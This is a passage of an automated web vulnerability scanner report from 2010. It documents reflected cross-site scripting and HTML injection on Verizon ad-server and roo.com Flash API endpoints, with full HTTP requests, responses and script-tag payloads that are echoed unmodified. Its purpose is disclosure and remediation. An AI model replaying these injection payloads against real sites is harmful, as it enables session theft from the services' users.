GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(document.cookies)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMTb73fe<script>alert(1)</script>97455ab54ef/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:55:15 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 469
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 469

<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net8b439"><script>alert(document.cookies)</script>HOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMTb73fe<script>alert(1)</script>97455ab54ef/homepage/976684413/Top/default/empty.gif/726e6f58326b7a6e4b45494141693565?x" target="_top">
...[SNIP]...

2.616. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(document.cookies)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(document.cookies)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1bcf9(a)a09d020cffc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(document.cookies)%3C/1bcf9(a)a09d020cffc/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:54:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 375
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 375

<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net8b439"><script>alert(document.cookies)</1bcf9(a)a09d020cffc/homepage/585918348/Top/default/empty.gif/726e6f58326b7a6e4b45494141693565?x" target="_top">
...[SNIP]...

2.617. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(document.cookies)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(document.cookies)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload da1ed<script>alert(1)</script>aabd95b8ff4 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(document.cookies)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepageda1ed<script>alert(1)</script>aabd95b8ff4/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:55:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 470
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 470

<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net8b439"><script>alert(document.cookies)</script>HOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepageda1ed<script>alert(1)</script>aabd95b8ff4/1824060075/Top/default/empty.gif/726e6f58326b7a6e4b45494141693565?x" target="_top">
...[SNIP]...

2.618. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(document.cookies)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(document.cookies)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 1ede8<script>alert(1)</script>f1fad4eed6b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(document.cookies)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top1ede8<script>alert(1)</script>f1fad4eed6b?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:55:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 462
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 462

<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net8b439"><script>alert(document.cookies)</script>HOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/1471133253/Top1ede8<script>alert(1)</script>f1fad4eed6b/default/empty.gif/726e6f58326b7a6e4b45494141693565?x" target="_top">
...[SNIP]...

2.619. http://publish.flashapi.vx.roo.com/16359446-8e33-4088-821a-293e3bfd9acd-174406/ChannelInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /16359446-8e33-4088-821a-293e3bfd9acd-174406/ChannelInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8f04a<a>ceaf45e0946 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /16359446-8e33-4088-821a-293e3bfd9acd-174406/ChannelInfoService.aspx?siteid=16359446-8e33-4088-821a-293e3bfd9acd-174406&8f04a<a>ceaf45e0946=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://publish.vx.roo.com/verizonsmb/standard/vxCore.swf
x-flash-version: 10,1,102,64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: publish.flashapi.vx.roo.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 21 Nov 2010 22:03:22 GMT
Connection: close
Content-Length: 20181

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/16359446-8e33-4088-821a-293e3bfd9acd-174406&8f04a<a>ceaf45e0946=1/ChannelInfoService.asmx" />
...[SNIP]...

2.620. http://publish.flashapi.vx.roo.com/16359446-8e33-4088-821a-293e3bfd9acd-174406/ChannelInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /16359446-8e33-4088-821a-293e3bfd9acd-174406/ChannelInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 99054<a>b61c0baaffb was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /16359446-8e33-4088-821a-293e3bfd9acd-174406/ChannelInfoService.aspx?siteid=16359446-8e33-4088-821a-293e3bfd9acd-17440699054<a>b61c0baaffb HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://publish.vx.roo.com/verizonsmb/standard/vxCore.swf
x-flash-version: 10,1,102,64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: publish.flashapi.vx.roo.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 21 Nov 2010 22:03:20 GMT
Connection: close
Content-Length: 20169

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/16359446-8e33-4088-821a-293e3bfd9acd-17440699054<a>b61c0baaffb/ChannelInfoService.asmx" />
...[SNIP]...

2.621. http://publish.flashapi.vx.roo.com/16359446-8e33-4088-821a-293e3bfd9acd-174406/PlaylistInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /16359446-8e33-4088-821a-293e3bfd9acd-174406/PlaylistInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 98b1d<a>33644c19fcb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /16359446-8e33-4088-821a-293e3bfd9acd-174406/PlaylistInfoService.aspx?siteid=16359446-8e33-4088-821a-293e3bfd9acd-174406&98b1d<a>33644c19fcb=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://publish.vx.roo.com/verizonsmb/standard/vxCore.swf
x-flash-version: 10,1,102,64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: publish.flashapi.vx.roo.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 21 Nov 2010 22:03:28 GMT
Connection: close
Content-Length: 27398

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/16359446-8e33-4088-821a-293e3bfd9acd-174406&98b1d<a>33644c19fcb=1/PlaylistInfoService.asmx" />
...[SNIP]...

2.622. http://publish.flashapi.vx.roo.com/16359446-8e33-4088-821a-293e3bfd9acd-174406/PlaylistInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /16359446-8e33-4088-821a-293e3bfd9acd-174406/PlaylistInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload c82d4<a>b9e2d963e05 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /16359446-8e33-4088-821a-293e3bfd9acd-174406/PlaylistInfoService.aspx?siteid=16359446-8e33-4088-821a-293e3bfd9acd-174406c82d4<a>b9e2d963e05 HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://publish.vx.roo.com/verizonsmb/standard/vxCore.swf
x-flash-version: 10,1,102,64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: publish.flashapi.vx.roo.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 21 Nov 2010 22:03:27 GMT
Connection: close
Content-Length: 27386

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/16359446-8e33-4088-821a-293e3bfd9acd-174406c82d4<a>b9e2d963e05/PlaylistInfoService.asmx" />
...[SNIP]...

2.623. http://publish.flashapi.vx.roo.com/16359446-8e33-4088-821a-293e3bfd9acd-174407/ChannelInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /16359446-8e33-4088-821a-293e3bfd9acd-174407/ChannelInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d66a8<a>e12ac3efe9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /16359446-8e33-4088-821a-293e3bfd9acd-174407/ChannelInfoService.aspx?siteid=16359446-8e33-4088-821a-293e3bfd9acd-174407&d66a8<a>e12ac3efe9e=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://publish.vx.roo.com/verizonsmb/standard/vxCore.swf
x-flash-version: 10,1,102,64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: publish.flashapi.vx.roo.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 21 Nov 2010 22:04:30 GMT
Connection: close
Content-Length: 20181

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/16359446-8e33-4088-821a-293e3bfd9acd-174407&d66a8<a>e12ac3efe9e=1/ChannelInfoService.asmx" />
...[SNIP]...

2.624. http://publish.flashapi.vx.roo.com/16359446-8e33-4088-821a-293e3bfd9acd-174407/ChannelInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /16359446-8e33-4088-821a-293e3bfd9acd-174407/ChannelInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 1550a<a>c1d7a417829 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /16359446-8e33-4088-821a-293e3bfd9acd-174407/ChannelInfoService.aspx?siteid=16359446-8e33-4088-821a-293e3bfd9acd-1744071550a<a>c1d7a417829 HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://publish.vx.roo.com/verizonsmb/standard/vxCore.swf
x-flash-version: 10,1,102,64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: publish.flashapi.vx.roo.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 21 Nov 2010 22:04:28 GMT
Connection: close
Content-Length: 20169

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/16359446-8e33-4088-821a-293e3bfd9acd-1744071550a<a>c1d7a417829/ChannelInfoService.asmx" />
...[SNIP]...

2.625. http://publish.flashapi.vx.roo.com/16359446-8e33-4088-821a-293e3bfd9acd-174407/PlaylistInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /16359446-8e33-4088-821a-293e3bfd9acd-174407/PlaylistInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 104f8<a>3b39ba697af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /16359446-8e33-4088-821a-293e3bfd9acd-174407/PlaylistInfoService.aspx?siteid=16359446-8e33-4088-821a-293e3bfd9acd-174407&104f8<a>3b39ba697af=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://publish.vx.roo.com/verizonsmb/standard/vxCore.swf
x-flash-version: 10,1,102,64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: publish.flashapi.vx.roo.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 21 Nov 2010 22:04:35 GMT
Connection: close
Content-Length: 27398

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/16359446-8e33-4088-821a-293e3bfd9acd-174407&104f8<a>3b39ba697af=1/PlaylistInfoService.asmx" />
...[SNIP]...

2.626. http://publish.flashapi.vx.roo.com/16359446-8e33-4088-821a-293e3bfd9acd-174407/PlaylistInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /16359446-8e33-4088-821a-293e3bfd9acd-174407/PlaylistInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload b3502<a>298cc2c15f0 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /16359446-8e33-4088-821a-293e3bfd9acd-174407/PlaylistInfoService.aspx?siteid=16359446-8e33-4088-821a-293e3bfd9acd-174407b3502<a>298cc2c15f0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://publish.vx.roo.com/verizonsmb/standard/vxCore.swf
x-flash-version: 10,1,102,64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: publish.flashapi.vx.roo.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 21 Nov 2010 22:04:33 GMT
Connection: close
Content-Length: 27386

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/16359446-8e33-4088-821a-293e3bfd9acd-174407b3502<a>298cc2c15f0/PlaylistInfoService.asmx" />
...[SNIP]...

2.627. http://publish.flashapi.vx.roo.com/8dbfb0ba-4add-46fb-a53d-245440ef71a4-202995/ChannelInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /8dbfb0ba-4add-46fb-a53d-245440ef71a4-202995/ChannelInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 81c0b<a>3124755a259 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

